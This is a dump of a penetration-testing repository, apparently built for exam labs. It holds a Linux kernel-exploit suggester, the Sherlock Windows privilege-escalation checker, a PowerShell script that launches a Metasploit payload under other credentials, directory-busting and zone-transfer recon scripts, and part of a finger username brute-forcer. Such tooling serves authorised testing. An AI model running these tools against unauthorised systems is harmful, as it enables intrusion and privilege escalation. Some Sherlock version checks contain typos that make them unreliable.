305 | "open-time Capability file_ns_capable() Privilege Escalation":{"minver":"0", "maxver":"99", "exploitdb":"25450", "lang":"c", "keywords":{"loc":["kernel"], "val":"kernel"}},
306 | }
307 |
308 | # variable declaration
309 | os = sysInfo["OS"]["results"][0]
310 | version = sysInfo["KERNEL"]["results"][0].split(" ")[2].split("-")[0]
311 | langs = devTools["TOOLS"]["results"]
312 | procs = getAppProc["PROCS"]["results"]
313 | kernel = str(sysInfo["KERNEL"]["results"][0])
314 | mount = driveInfo["MOUNT"]["results"]
315 | #pkgs = getAppProc["PKGS"]["results"] # currently not using packages for sploit appicability but my in future
316 |
317 |
318 | # lists to hold ranked, applicable sploits
319 | # note: this is a best-effort, basic ranking designed to help in prioritizing priv escalation exploit checks
320 | # all applicable exploits should be checked and this function could probably use some improvement
321 | avgprob = []
322 | highprob = []
323 |
324 | for sploit in sploits:
325 | lang = 0 # use to rank applicability of sploits
326 | keyword = sploits[sploit]["keywords"]["val"]
327 | sploitout = sploit + " || " + "http://www.exploit-db.com/exploits/" + sploits[sploit]["exploitdb"] + " || " + "Language=" + sploits[sploit]["lang"]
328 | # first check for kernell applicability
329 | if (version >= sploits[sploit]["minver"]) and (version <= sploits[sploit]["maxver"]):
330 | # next check language applicability
331 | if (sploits[sploit]["lang"] == "c") and (("gcc" in str(langs)) or ("cc" in str(langs))):
332 | lang = 1 # language found, increase applicability score
333 | elif sploits[sploit]["lang"] == "sh":
334 | lang = 1 # language found, increase applicability score
335 | elif (sploits[sploit]["lang"] in str(langs)):
336 | lang = 1 # language found, increase applicability score
337 | if lang == 0:
338 | sploitout = sploitout + "**" # added mark if language not detected on system
339 | # next check keyword matches to determine if some sploits have a higher probability of success
340 | for loc in sploits[sploit]["keywords"]["loc"]:
341 | if loc == "proc":
342 | for proc in procs:
343 | if keyword in proc:
344 | highprob.append(sploitout) # if sploit is associated with a running process consider it a higher probability/applicability
345 | break
346 | break
347 | elif loc == "os":
348 | if (keyword in os) or (keyword in kernel):
349 | highprob.append(sploitout) # if sploit is specifically applicable to this OS consider it a higher probability/applicability
350 | break
351 | elif loc == "mnt":
352 | if keyword in mount:
353 | highprob.append(sploitout) # if sploit is specifically applicable to a mounted file system consider it a higher probability/applicability
354 | break
355 | else:
356 | avgprob.append(sploitout) # otherwise, consider average probability/applicability based only on kernel version
357 |
358 | print " Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!"
359 | print
360 |
361 | print " The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system"
362 | for exploit in highprob:
363 | print " - " + exploit
364 | print
365 |
366 | print " The following exploits are applicable to this kernel version and should be investigated as well"
367 | for exploit in avgprob:
368 | print " - " + exploit
369 |
370 | print
371 | print "Finished"
372 | print bigline
373 |
--------------------------------------------------------------------------------
/priv_escalation/Windows/README.md:
--------------------------------------------------------------------------------
1 | ## Links do check
2 |
3 | http://www.fuzzysecurity.com/tutorials/16.html
4 | https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
5 |
--------------------------------------------------------------------------------
/priv_escalation/Windows/Sherlock.ps1:
--------------------------------------------------------------------------------
1 | <#
2 |
3 | File: Sherlock.ps1
4 | Author: @_RastaMouse
5 | License: GNU General Public License v3.0
6 |
7 | #>
8 |
9 | <#
10 |
11 | RTM build reference, because I'm stupid and forget...
12 |
13 | 6002: Vista SP2/2008 SP2
14 | 7600: 7/2008 R2
15 | 7601: 7 SP1/2008 R2 SP1
16 | 9200: 8/2012
17 | 9600: 8.1/2012 R2
18 | 10240: 10 Threshold
19 | 10586: 10 Threshold 2
20 | 14393: 10 Redstone/2016
21 | 15063: 10 Redstone 2
22 | 16299: 10 Redstone 3
23 | 17134: 10 Redstone 4
24 |
25 | #>
26 |
27 | $Global:ExploitTable = $null
28 |
29 | function Get-FileVersionInfo ($FilePath) {
30 |
31 | $VersionInfo = (Get-Item $FilePath).VersionInfo
32 | $FileVersion = ( "{0}.{1}.{2}.{3}" -f $VersionInfo.FileMajorPart, $VersionInfo.FileMinorPart, $VersionInfo.FileBuildPart, $VersionInfo.FilePrivatePart )
33 |
34 | return $FileVersion
35 |
36 | }
37 |
38 | function Get-InstalledSoftware($SoftwareName) {
39 |
40 | $SoftwareVersion = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name -eq $SoftwareName } | Select-Object Version
41 | $SoftwareVersion = $SoftwareVersion.Version # I have no idea what I'm doing
42 |
43 | return $SoftwareVersion
44 |
45 | }
46 |
47 | function Get-Architecture {
48 |
49 | # This is the CPU architecture. Returns "64-bit" or "32-bit".
50 | $CPUArchitecture = (Get-WmiObject Win32_OperatingSystem).OSArchitecture
51 |
52 | # This is the process architecture, e.g. are we an x86 process running on a 64-bit system. Retuns "AMD64" or "x86".
53 | $ProcessArchitecture = $env:PROCESSOR_ARCHITECTURE
54 |
55 | return $CPUArchitecture, $ProcessArchitecture
56 |
57 | }
58 |
59 | function Get-CPUCoreCount {
60 |
61 | $CoreCount = (Get-WmiObject Win32_Processor).NumberOfLogicalProcessors
62 |
63 | return $CoreCount
64 |
65 | }
66 |
67 | function New-ExploitTable {
68 |
69 | # Create the table
70 | $Global:ExploitTable = New-Object System.Data.DataTable
71 |
72 | # Create the columns
73 | $Global:ExploitTable.Columns.Add("Title")
74 | $Global:ExploitTable.Columns.Add("MSBulletin")
75 | $Global:ExploitTable.Columns.Add("CVEID")
76 | $Global:ExploitTable.Columns.Add("Link")
77 | $Global:ExploitTable.Columns.Add("VulnStatus")
78 |
79 | # Add the exploits we are interested in.
80 |
81 | # MS10
82 | $Global:ExploitTable.Rows.Add("User Mode to Ring (KiTrap0D)","MS10-015","2010-0232","https://www.exploit-db.com/exploits/11199/")
83 | $Global:ExploitTable.Rows.Add("Task Scheduler .XML","MS10-092","2010-3338, 2010-3888","https://www.exploit-db.com/exploits/19930/")
84 | # MS13
85 | $Global:ExploitTable.Rows.Add("NTUserMessageCall Win32k Kernel Pool Overflow","MS13-053","2013-1300","https://www.exploit-db.com/exploits/33213/")
86 | $Global:ExploitTable.Rows.Add("TrackPopupMenuEx Win32k NULL Page","MS13-081","2013-3881","https://www.exploit-db.com/exploits/31576/")
87 | # MS14
88 | $Global:ExploitTable.Rows.Add("TrackPopupMenu Win32k Null Pointer Dereference","MS14-058","2014-4113","https://www.exploit-db.com/exploits/35101/")
89 | # MS15
90 | $Global:ExploitTable.Rows.Add("ClientCopyImage Win32k","MS15-051","2015-1701, 2015-2433","https://www.exploit-db.com/exploits/37367/")
91 | $Global:ExploitTable.Rows.Add("Font Driver Buffer Overflow","MS15-078","2015-2426, 2015-2433","https://www.exploit-db.com/exploits/38222/")
92 | # MS16
93 | $Global:ExploitTable.Rows.Add("'mrxdav.sys' WebDAV","MS16-016","2016-0051","https://www.exploit-db.com/exploits/40085/")
94 | $Global:ExploitTable.Rows.Add("Secondary Logon Handle","MS16-032","2016-0099","https://www.exploit-db.com/exploits/39719/")
95 | $Global:ExploitTable.Rows.Add("Windows Kernel-Mode Drivers EoP","MS16-034","2016-0093/94/95/96","https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-034?")
96 | $Global:ExploitTable.Rows.Add("Win32k Elevation of Privilege","MS16-135","2016-7255","https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/Sample-Exploits/MS16-135")
97 | # Miscs that aren't MS
98 | $Global:ExploitTable.Rows.Add("Nessus Agent 6.6.2 - 6.10.3","N/A","2017-7199","https://aspe1337.blogspot.co.uk/2017/04/writeup-of-cve-2017-7199.html")
99 |
100 | }
101 |
102 | function Set-ExploitTable ($MSBulletin, $VulnStatus) {
103 |
104 | if ( $MSBulletin -like "MS*" ) {
105 |
106 | $Global:ExploitTable | Where-Object { $_.MSBulletin -eq $MSBulletin
107 |
108 | } | ForEach-Object {
109 |
110 | $_.VulnStatus = $VulnStatus
111 |
112 | }
113 |
114 | } else {
115 |
116 |
117 | $Global:ExploitTable | Where-Object { $_.CVEID -eq $MSBulletin
118 |
119 | } | ForEach-Object {
120 |
121 | $_.VulnStatus = $VulnStatus
122 |
123 | }
124 |
125 | }
126 |
127 | }
128 |
129 | function Get-Results {
130 |
131 | $Global:ExploitTable
132 |
133 | }
134 |
135 | function Find-AllVulns {
136 |
137 | if ( !$Global:ExploitTable ) {
138 |
139 | $null = New-ExploitTable
140 |
141 | }
142 |
143 | Find-MS10015
144 | Find-MS10092
145 | Find-MS13053
146 | Find-MS13081
147 | Find-MS14058
148 | Find-MS15051
149 | Find-MS15078
150 | Find-MS16016
151 | Find-MS16032
152 | Find-MS16034
153 | Find-MS16135
154 | Find-CVE20177199
155 |
156 | Get-Results
157 |
158 | }
159 |
160 | function Find-MS10015 {
161 |
162 | $MSBulletin = "MS10-015"
163 | $Architecture = Get-Architecture
164 |
165 | if ( $Architecture[0] -eq "64-bit" ) {
166 |
167 | $VulnStatus = "Not supported on 64-bit systems"
168 |
169 | } Else {
170 |
171 | $Path = $env:windir + "\system32\ntoskrnl.exe"
172 | $VersionInfo = Get-FileVersionInfo($Path)
173 | $VersionInfo = $VersionInfo.Split(".")
174 |
175 | $Build = $VersionInfo[2]
176 | $Revision = $VersionInfo[3].Split(" ")[0]
177 |
178 | switch ( $Build ) {
179 |
180 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20591" ] }
181 | default { $VulnStatus = "Not Vulnerable" }
182 |
183 | }
184 |
185 | }
186 |
187 | Set-ExploitTable $MSBulletin $VulnStatus
188 |
189 | }
190 |
191 | function Find-MS10092 {
192 |
193 | $MSBulletin = "MS10-092"
194 | $Architecture = Get-Architecture
195 |
196 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
197 |
198 | $Path = $env:windir + "\system32\schedsvc.dll"
199 |
200 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
201 |
202 | $Path = $env:windir + "\sysnative\schedsvc.dll"
203 |
204 | }
205 |
206 | $VersionInfo = Get-FileVersionInfo($Path)
207 | $VersionInfo = $VersionInfo.Split(".")
208 |
209 | $Build = $VersionInfo[2]
210 | $Revision = $VersionInfo[3].Split(" ")[0]
211 |
212 | switch ( $Build ) {
213 |
214 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20830" ] }
215 | default { $VulnStatus = "Not Vulnerable" }
216 |
217 | }
218 |
219 | Set-ExploitTable $MSBulletin $VulnStatus
220 |
221 | }
222 |
223 | function Find-MS13053 {
224 |
225 | $MSBulletin = "MS13-053"
226 | $Architecture = Get-Architecture
227 |
228 | if ( $Architecture[0] -eq "64-bit" ) {
229 |
230 | $VulnStatus = "Not supported on 64-bit systems"
231 |
232 | } Else {
233 |
234 | $Path = $env:windir + "\system32\win32k.sys"
235 | $VersionInfo = Get-FileVersionInfo($Path)
236 | $VersionInfo = $VersionInfo.Split(".")
237 |
238 | $Build = $VersionInfo[2]
239 | $Revision = $VersionInfo[3].Split(" ")[0]
240 |
241 | switch ( $Build ) {
242 |
243 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "17000" ] }
244 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22348" ] }
245 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20732" ] }
246 | default { $VulnStatus = "Not Vulnerable" }
247 |
248 | }
249 |
250 | }
251 |
252 | Set-ExploitTable $MSBulletin $VulnStatus
253 |
254 | }
255 |
256 | function Find-MS13081 {
257 |
258 | $MSBulletin = "MS13-081"
259 | $Architecture = Get-Architecture
260 |
261 | if ( $Architecture[0] -eq "64-bit" ) {
262 |
263 | $VulnStatus = "Not supported on 64-bit systems"
264 |
265 | } Else {
266 |
267 | $Path = $env:windir + "\system32\win32k.sys"
268 | $VersionInfo = Get-FileVersionInfo($Path)
269 | $VersionInfo = $VersionInfo.Split(".")
270 |
271 | $Build = $VersionInfo[2]
272 | $Revision = $VersionInfo[3].Split(" ")[0]
273 |
274 | switch ( $Build ) {
275 |
276 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] }
277 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22435" ] }
278 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "20807" ] }
279 | default { $VulnStatus = "Not Vulnerable" }
280 |
281 | }
282 |
283 | }
284 |
285 | Set-ExploitTable $MSBulletin $VulnStatus
286 |
287 | }
288 |
289 | function Find-MS14058 {
290 |
291 | $MSBulletin = "MS14-058"
292 | $Architecture = Get-Architecture
293 |
294 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
295 |
296 | $Path = $env:windir + "\system32\win32k.sys"
297 |
298 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
299 |
300 | $Path = $env:windir + "\sysnative\win32k.sys"
301 |
302 | }
303 |
304 | $VersionInfo = Get-FileVersionInfo($Path)
305 | $VersionInfo = $VersionInfo.Split(".")
306 |
307 | $Build = $VersionInfo[2]
308 | $Revision = $VersionInfo[3].Split(" ")[0]
309 |
310 | switch ( $Build ) {
311 |
312 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -ge "18000" ] }
313 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] }
314 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] }
315 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] }
316 | default { $VulnStatus = "Not Vulnerable" }
317 |
318 | }
319 |
320 | Set-ExploitTable $MSBulletin $VulnStatus
321 |
322 | }
323 |
324 | function Find-MS15051 {
325 |
326 | $MSBulletin = "MS15-051"
327 | $Architecture = Get-Architecture
328 |
329 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
330 |
331 | $Path = $env:windir + "\system32\win32k.sys"
332 |
333 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
334 |
335 | $Path = $env:windir + "\sysnative\win32k.sys"
336 |
337 | }
338 |
339 | $VersionInfo = Get-FileVersionInfo($Path)
340 | $VersionInfo = $VersionInfo.Split(".")
341 |
342 | $Build = $VersionInfo[2]
343 | $Revision = $VersionInfo[3].Split(" ")[0]
344 |
345 | switch ( $Build ) {
346 |
347 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18000" ] }
348 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "22823" ] }
349 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21247" ] }
350 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "17353" ] }
351 | default { $VulnStatus = "Not Vulnerable" }
352 |
353 | }
354 |
355 | Set-ExploitTable $MSBulletin $VulnStatus
356 |
357 | }
358 |
359 | function Find-MS15078 {
360 |
361 | $MSBulletin = "MS15-078"
362 |
363 | $Path = $env:windir + "\system32\atmfd.dll"
364 | $VersionInfo = Get-FileVersionInfo($Path)
365 | $VersionInfo = $VersionInfo.Split(" ")
366 |
367 | $Revision = $VersionInfo[2]
368 |
369 | switch ( $Revision ) {
370 |
371 | 243 { $VulnStatus = "Appears Vulnerable" }
372 | default { $VulnStatus = "Not Vulnerable" }
373 |
374 | }
375 |
376 | Set-ExploitTable $MSBulletin $VulnStatus
377 |
378 | }
379 |
380 | function Find-MS16016 {
381 |
382 | $MSBulletin = "MS16-016"
383 | $Architecture = Get-Architecture
384 |
385 | if ( $Architecture[0] -eq "64-bit" ) {
386 |
387 | $VulnStatus = "Not supported on 64-bit systems"
388 |
389 | } Else {
390 |
391 | $Path = $env:windir + "\system32\drivers\mrxdav.sys"
392 | $VersionInfo = Get-FileVersionInfo($Path)
393 | $VersionInfo = $VersionInfo.Split(".")
394 |
395 | $Build = $VersionInfo[2]
396 | $Revision = $VersionInfo[3].Split(" ")[0]
397 |
398 | switch ( $Build ) {
399 |
400 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16000" ] }
401 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "23317" ] }
402 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "21738" ] }
403 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "18189" ] }
404 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "16683" ] }
405 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le "103" ] }
406 | default { $VulnStatus = "Not Vulnerable" }
407 |
408 | }
409 |
410 | }
411 |
412 | Set-ExploitTable $MSBulletin $VulnStatus
413 |
414 | }
415 |
416 | function Find-MS16032 {
417 |
418 | $MSBulletin = "MS16-032"
419 |
420 | $CPUCount = Get-CPUCoreCount
421 |
422 | if ( $CPUCount -eq "1" ) {
423 |
424 | $VulnStatus = "Not Supported on single-core systems"
425 |
426 | } Else {
427 |
428 | $Architecture = Get-Architecture
429 |
430 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
431 |
432 | $Path = $env:windir + "\system32\seclogon.dll"
433 |
434 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
435 |
436 | $Path = $env:windir + "\sysnative\seclogon.dll"
437 |
438 | }
439 |
440 | $VersionInfo = Get-FileVersionInfo($Path)
441 |
442 | $VersionInfo = $VersionInfo.Split(".")
443 |
444 | $Build = [int]$VersionInfo[2]
445 | $Revision = [int]$VersionInfo[3].Split(" ")[0]
446 |
447 | switch ( $Build ) {
448 |
449 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19598 -Or ( $Revision -ge 23000 -And $Revision -le 23909 ) ] }
450 | 7600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19148 ] }
451 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19148 -Or ( $Revision -ge 23000 -And $Revision -le 23347 ) ] }
452 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17649 -Or ( $Revision -ge 21000 -And $Revision -le 21767 ) ] }
453 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18230 ] }
454 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 16724 ] }
455 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 161 ] }
456 | default { $VulnStatus = "Not Vulnerable" }
457 |
458 | }
459 | }
460 |
461 | Set-ExploitTable $MSBulletin $VulnStatus
462 |
463 | }
464 |
465 | function Find-MS16034 {
466 |
467 | $MSBulletin = "MS16-034"
468 |
469 | $Architecture = Get-Architecture
470 |
471 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
472 |
473 | $Path = $env:windir + "\system32\win32k.sys"
474 |
475 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
476 |
477 | $Path = $env:windir + "\sysnative\win32k.sys"
478 |
479 | }
480 |
481 | $VersionInfo = Get-FileVersionInfo($Path)
482 |
483 | $VersionInfo = $VersionInfo.Split(".")
484 |
485 | $Build = [int]$VersionInfo[2]
486 | $Revision = [int]$VersionInfo[3].Split(" ")[0]
487 |
488 | switch ( $Build ) {
489 |
490 | 6002 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 19597 -Or $Revision -lt 23908 ] }
491 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 19145 -Or $Revision -lt 23346 ] }
492 | 9200 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 17647 -Or $Revision -lt 21766 ] }
493 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revison -lt 18228 ] }
494 | default { $VulnStatus = "Not Vulnerable" }
495 |
496 | }
497 |
498 | Set-ExploitTable $MSBulletin $VulnStatus
499 |
500 | }
501 |
502 | function Find-CVE20177199 {
503 |
504 | $CVEID = "2017-7199"
505 | $SoftwareVersion = Get-InstalledSoftware "Nessus Agent"
506 |
507 | if ( !$SoftwareVersion ) {
508 |
509 | $VulnStatus = "Not Vulnerable"
510 |
511 | } else {
512 |
513 | $SoftwareVersion = $SoftwareVersion.Split(".")
514 |
515 | $Major = [int]$SoftwareVersion[0]
516 | $Minor = [int]$SoftwareVersion[1]
517 | $Build = [int]$SoftwareVersion[2]
518 |
519 | switch( $Major ) {
520 |
521 | 6 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Minor -eq 10 -and $Build -le 3 -Or ( $Minor -eq 6 -and $Build -le 2 ) -Or ( $Minor -le 9 -and $Minor -ge 7 ) ] } # 6.6.2 - 6.10.3
522 | default { $VulnStatus = "Not Vulnerable" }
523 |
524 | }
525 |
526 | }
527 |
528 | Set-ExploitTable $CVEID $VulnStatus
529 |
530 | }
531 |
532 | function Find-MS16135 {
533 |
534 | $MSBulletin = "MS16-135"
535 | $Architecture = Get-Architecture
536 |
537 | if ( $Architecture[1] -eq "AMD64" -or $Architecture[0] -eq "32-bit" ) {
538 |
539 | $Path = $env:windir + "\system32\win32k.sys"
540 |
541 | } ElseIf ( $Architecture[0] -eq "64-bit" -and $Architecture[1] -eq "x86" ) {
542 |
543 | $Path = $env:windir + "\sysnative\win32k.sys"
544 |
545 | }
546 |
547 | $VersionInfo = Get-FileVersionInfo($Path)
548 | $VersionInfo = $VersionInfo.Split(".")
549 |
550 | $Build = [int]$VersionInfo[2]
551 | $Revision = [int]$VersionInfo[3].Split(" ")[0]
552 |
553 | switch ( $Build ) {
554 |
555 | 7601 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -lt 23584 ] }
556 | 9600 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 18524 ] }
557 | 10240 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 16384 ] }
558 | 10586 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 19 ] }
559 | 14393 { $VulnStatus = @("Not Vulnerable","Appears Vulnerable")[ $Revision -le 446 ] }
560 | default { $VulnStatus = "Not Vulnerable" }
561 |
562 | }
563 |
564 | Set-ExploitTable $MSBulletin $VulnStatus
565 |
566 | }
--------------------------------------------------------------------------------
/priv_escalation/Windows/elevate_privileges.ps1:
--------------------------------------------------------------------------------
1 | # Alternative to "su " or something like that in Windows boxes
2 |
3 | $secpasswd = ConvertTo-SecureString "" -AsPlainText -Force
4 | $mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd)
5 | $computer = ""
6 | [System.Diagnostics.Process]::Start("C:\Users\public\msfpayload3.exe","", $mycreds.Username, $mycreds.Password, $computer)
7 |
--------------------------------------------------------------------------------
/recon_scan/dirbust.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python
2 |
3 | import sys
4 | import os
5 | import subprocess
6 |
7 | if len(sys.argv) != 3:
8 | print "Usage: dirbust.py "
9 | sys.exit(0)
10 |
11 | url = str(sys.argv[1])
12 | name = str(sys.argv[2])
13 | folders = ["/usr/share/dirb/wordlists", "/usr/share/dirb/wordlists/vulns"]
14 |
15 | found = []
16 | print "INFO: Starting dirb scan for " + url
17 | for folder in folders:
18 | for filename in os.listdir(folder):
19 |
20 | outfile = " -o " + "results/exam/" + name + "_dirb_" + filename
21 | DIRBSCAN = "dirb %s %s/%s %s -S -r" % (url, folder, filename, outfile)
22 | try:
23 | results = subprocess.check_output(DIRBSCAN, shell=True)
24 | resultarr = results.split("\n")
25 | for line in resultarr:
26 | if "+" in line:
27 | if line not in found:
28 | found.append(line)
29 | except:
30 | pass
31 |
32 | try:
33 | if found[0] != "":
34 | print "[*] Dirb found the following items..."
35 | for item in found:
36 | print " " + item
37 | except:
38 | print "INFO: No items found during dirb scan of " + url
39 |
--------------------------------------------------------------------------------
/recon_scan/dnsrecon.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | import subprocess
3 | import sys
4 |
5 | if len(sys.argv) != 2:
6 | print "Usage: dnsrecon.py "
7 | sys.exit(0)
8 |
9 | ip_address = sys.argv[1]
10 | HOSTNAME = "nmblookup -A %s | grep '<00>' | grep -v '' | cut -d' ' -f1" % (ip_address)# grab the hostname
11 | host = subprocess.check_output(HOSTNAME, shell=True).strip()
12 | print "INFO: Attempting Domain Transfer on " + host
13 | ZT = "dig @%s.thinc.local thinc.local axfr" % (host)
14 | ztresults = subprocess.check_output(ZT, shell=True)
15 | if "failed" in ztresults:
16 | print "INFO: Zone Transfer failed for " + host
17 | else:
18 | print "[*] Zone Transfer successful for " + host + "(" + ip_address + ")!!! [see output file]"
19 | outfile = "results/exam/" + ip_address+ "_zonetransfer.txt"
20 | dnsf = open(outfile, "w")
21 | dnsf.write(ztresults)
22 | dnsf.close
23 |
24 |
--------------------------------------------------------------------------------
/recon_scan/finger-user-enum.pl:
--------------------------------------------------------------------------------
1 | #!/usr/bin/perl -w
2 | # finger-user-enum - Brute Force Username via Finger Service
3 | # Copyright (C) 2006 pentestmonkey@pentestmonkey.net
4 | #
5 | # This program is free software; you can redistribute it and/or modify
6 | # it under the terms of the GNU General Public License version 2 as
7 | # published by the Free Software Foundation.
8 | #
9 | # This program is distributed in the hope that it will be useful,
10 | # but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | # GNU General Public License for more details.
13 | #
14 | # You should have received a copy of the GNU General Public License along
15 | # with this program; if not, write to the Free Software Foundation, Inc.,
16 | # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
17 | #
18 | # This tool may be used for legal purposes only. Users take full responsibility
19 | # for any actions performed using this tool. If these terms are not acceptable to
20 | # you, then do not use this tool.
21 | #
22 | # You are encouraged to send comments, improvements or suggestions to
23 | # me at finger-user-enum@pentestmonkey.net
24 | #
25 | # This program is derived from dns-grind v1.0 ( http://pentestmonkey.net/tools/dns-grind )
26 |
27 | use strict;
28 | use Socket;
29 | use IO::Handle;
30 | use IO::Select;
31 | use IO::Socket::INET;
32 | use Getopt::Std;
33 | $| = 1;
34 |
35 | my $VERSION = "1.0";
36 | my $debug = 0;
37 | my @child_handles = ();
38 | my $verbose = 0;
39 | my $max_procs = 5;
40 | my $finger_port = 79;
41 | my @usernames = ();
42 | my @hosts = ();
43 | my $recursive_flag = 1;
44 | my $relayserver = undef;
45 | my $query_timeout = 5;
46 | my $start_time = time();
47 | my $end_time;
48 | my $kill_child_string = "\x00";
49 | $SIG{CHLD} = 'IGNORE'; # auto-reap
50 | my %opts;
51 | my $usage=<;
119 | }
120 |
121 | if (defined($host_file)) {
122 | open(FILE, "<$host_file") or die "ERROR: Can't open username file $host_file: $!\n";
123 | @hosts = map { chomp($_); $_ } ;
124 | }
125 |
126 | if (defined($username)) {
127 | push @usernames, $username;
128 | }
129 |
130 | if (defined($host)) {
131 | push @hosts, $host;
132 | }
133 |
134 | if (defined($host_file) and not @hosts) {
135 | print "ERROR: Targets file $host_file was empty\n";
136 | exit 1;
137 | }
138 |
139 | if (defined($username_file) and not @usernames) {
140 | print "ERROR: Username file $username_file was empty\n";
141 | exit 1;
142 | }
143 |
144 | print "Starting finger-user-enum v$VERSION ( http://pentestmonkey.net/tools/finger-user-enum )\n";
145 | print "\n";
146 | print " ----------------------------------------------------------\n";
147 | print "| Scan Information |\n";
148 | print " ----------------------------------------------------------\n";
149 | print "\n";
150 | print "Worker Processes ......... $max_procs\n";
151 | print "Targets file ............. $host_file\n" if defined($host_file);
152 | print "Usernames file ........... $username_file\n" if defined($username_file);
153 | print "Target count ............. " . scalar(@hosts) . "\n" if @hosts;
154 | print "Username count ........... " . scalar(@usernames) . "\n" if @usernames;
155 | print "Target TCP port .......... $finger_port\n";
156 | print "Query timeout ............ $query_timeout secs\n";
157 | if (defined($relayserver)) {
158 | print "Relay Server ............. $relayserver\n";
159 | } else {
160 | print "Relay Server ............. Not used\n";
161 | }
162 | print "\n";
163 | print "######## Scan started at " . scalar(localtime()) . " #########\n";
164 |
165 | # Spawn off correct number of children
166 | foreach my $proc_count (1..$max_procs) {
167 | socketpair(my $child, my $parent, AF_UNIX, SOCK_STREAM, PF_UNSPEC) or die "socketpair: $!";
168 | $child->autoflush(1);
169 | $parent->autoflush(1);
170 |
171 | # Parent executes this
172 | if (my $pid = fork) {
173 | close $parent;
174 | print "[Parent] Spawned child with PID $pid to do resolving\n" if $debug;
175 | push @child_handles, $child;
176 |
177 | # Chile executes this
178 | } else {
179 | close $child;
180 | while (1) {
181 | my $timed_out = 0;
182 |
183 | # Read host and username from parent
184 | my $line = <$parent>;
185 | chomp($line);
186 | my ($host, $username) = $line =~ /^(\S+)\t(.*)$/;
187 |
188 | # Exit if told to by parent
189 | if ($line eq $kill_child_string) {
190 | print "[Child $$] Exiting\n" if $debug;
191 | exit 0;
192 | }
193 |
194 | # Sanity check host and username
195 | if (defined($host) and defined($username)) {
196 | print "[Child $$] Passed host $host and username $username\n" if $debug;
197 | } else {
198 | print "[Child $$] WARNING: Passed garbage. Ignoring: $line\n";
199 | next;
200 | }
201 |
202 | # Do finger query with timeout
203 | my $response;
204 | eval {
